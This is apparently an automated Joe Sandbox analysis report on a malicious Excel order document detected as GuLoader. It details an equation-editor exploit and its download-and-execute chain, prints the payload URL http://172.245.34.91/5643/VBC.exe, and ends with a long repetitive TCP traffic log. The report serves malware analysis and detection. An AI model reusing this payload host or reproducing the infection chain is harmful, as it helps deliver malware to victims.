Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ACP-2210825ORDER.xls

Overview

General Information

Sample Name:ACP-2210825ORDER.xls
Analysis ID:755822
MD5:6c84860292e2a4d210396b7012be9b8a
SHA1:7061c26320bf8836b55ac660860fa0937ae8f48e
SHA256:cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
Tags:xls
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Document contains embedded VBA macros
PE file contains more sections than normal
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1036 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1168 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1136 cmdline: "C:\Users\Public\vbc.exe" MD5: 7081C4822CF1C7572DD82822B8F27C49)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.34.91, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1168, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1168, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ACP-2210825ORDER.xlsVirustotal: Detection: 26%Perma Link
    Source: ACP-2210825ORDER.xlsAvira: detected
    Source: http://172.245.34.91/5643/VBC.exeAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMPAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.245.34.91 Port: 80Jump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00406555 FindFirstFileW,FindClose,5_2_00406555
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405A03
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040287E FindFirstFileW,5_2_0040287E

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035406CF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406FD ShellExecuteW,ExitProcess,2_2_035406FD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540660 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540660
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405D4 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035405D4
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405F0 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035405F0
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0354067A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0354067A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405BB ExitProcess,2_2_035405BB
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540722 ExitProcess,2_2_03540722
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406E8 ShellExecuteW,ExitProcess,2_2_035406E8
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
